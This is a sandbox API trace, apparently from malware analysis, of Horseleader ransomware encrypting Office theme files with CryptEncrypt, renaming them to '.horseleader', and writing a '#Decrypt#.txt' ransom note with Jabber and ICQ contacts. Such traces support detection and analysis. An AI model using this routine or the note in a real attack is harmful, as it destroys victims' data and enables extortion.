(in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.080] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.080] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.080] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x9cdf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.080] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.081] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.082] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.082] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x139be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.082] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.083] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.083] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.084] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.084] CloseHandle (hObject=0x1a4) returned 1 [0246.084] GetProcessHeap () returned 0x780000 [0246.084] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.084] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.horseleader") returned 85 [0246.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm.horseleader")) returned 1 [0246.085] GetProcessHeap () returned 0x780000 [0246.086] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.086] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, 
nFileSizeLow=0x211, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="AXIS.INF", cAlternateFileName="")) returned 1 [0246.086] lstrcmpiW (lpString1="AXIS.INF", lpString2="Windows") returned -1 [0246.086] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF") returned 73 [0246.086] StrStrIW (lpFirst="AXIS.INF", lpSrch=".horseleader") returned 0x0 [0246.086] lstrcmpW (lpString1="AXIS.INF", lpString2="#Decrypt#.txt") returned 1 [0246.086] lstrcmpW (lpString1="AXIS.INF", lpString2="_uninstalling_.png") returned 1 [0246.086] lstrlenW (lpString=".testttjffg") returned 11 [0246.086] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF", lpSrch=".testttjffg") returned 0x0 [0246.086] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.086] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.086] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF") returned 73 [0246.088] StrStrW (lpFirst="AXIS.INF", lpSrch=".txt") returned 0x0 [0246.088] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=529) returned 1 [0246.088] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesRead=0x32aeb7c*=0x211, lpOverlapped=0x0) returned 1 [0246.090] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.090] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x211, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x211, lpOverlapped=0x0) returned 1 [0246.090] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.090] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.090] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.090] CloseHandle (hObject=0x1a4) returned 1 [0246.091] GetProcessHeap () returned 0x780000 [0246.091] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.091] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF.horseleader") returned 85 [0246.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf.horseleader")) returned 1 [0246.094] GetProcessHeap () returned 0x780000 [0246.094] HeapFree (in: 
hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.095] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.095] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.095] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 76 [0246.095] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.095] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.095] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.095] lstrlenW (lpString=".testttjffg") returned 11 [0246.095] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.095] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.095] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.095] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.096] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 76 [0246.096] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.096] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2848) returned 1 [0246.096] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xb20, lpOverlapped=0x0) returned 1 [0246.098] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff4e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.098] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xb20, lpOverlapped=0x0) returned 1 [0246.098] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.098] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.098] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.099] CloseHandle (hObject=0x1a4) returned 1 [0246.099] GetProcessHeap () returned 0x780000 [0246.099] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.099] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\AXIS\\PREVIEW.GIF.horseleader") returned 88 [0246.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.horseleader")) returned 1 [0246.100] GetProcessHeap () returned 0x780000 [0246.100] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.100] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x8864, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.100] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.100] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 77 [0246.100] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.100] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.100] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.100] lstrlenW (lpString=".testttjffg") returned 11 [0246.100] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.101] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.101] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.101] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 77 [0246.101] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.101] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=34916) returned 1 [0246.101] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.105] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.105] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.105] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3864, lpOverlapped=0x0) returned 1 [0246.105] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc79c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0246.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3864, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3864, lpOverlapped=0x0) returned 1 [0246.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.106] CloseHandle (hObject=0x1a4) returned 1 [0246.106] GetProcessHeap () returned 0x780000 [0246.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.107] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.horseleader") returned 89 [0246.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.horseleader")) returned 1 [0246.107] GetProcessHeap () returned 0x780000 [0246.107] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.108] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x8864, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.108] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.108] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\#Decrypt#.txt") returned 78 [0246.108] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.108] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.108] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.110] lstrlenA (lpString="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") returned 1368 [0246.110] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.110] CloseHandle (hObject=0x158) returned 1 [0246.110] GetProcessHeap () returned 0x780000 [0246.110] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.110] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BLENDS", cAlternateFileName="")) returned 1 [0246.110] lstrcmpiW (lpString1="BLENDS", lpString2="Windows") returned -1 [0246.110] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS") returned 66 [0246.110] lstrcmpW (lpString1="BLENDS", lpString2=".") returned 1 [0246.110] lstrcmpW (lpString1="BLENDS", lpString2="..") returned 1 [0246.111] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.111] GetProcessHeap () returned 0x780000 [0246.111] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.111] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*") returned 68 [0246.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.112] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.112] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\.") returned 68 [0246.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.112] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.112] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\..") returned 69 [0246.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 
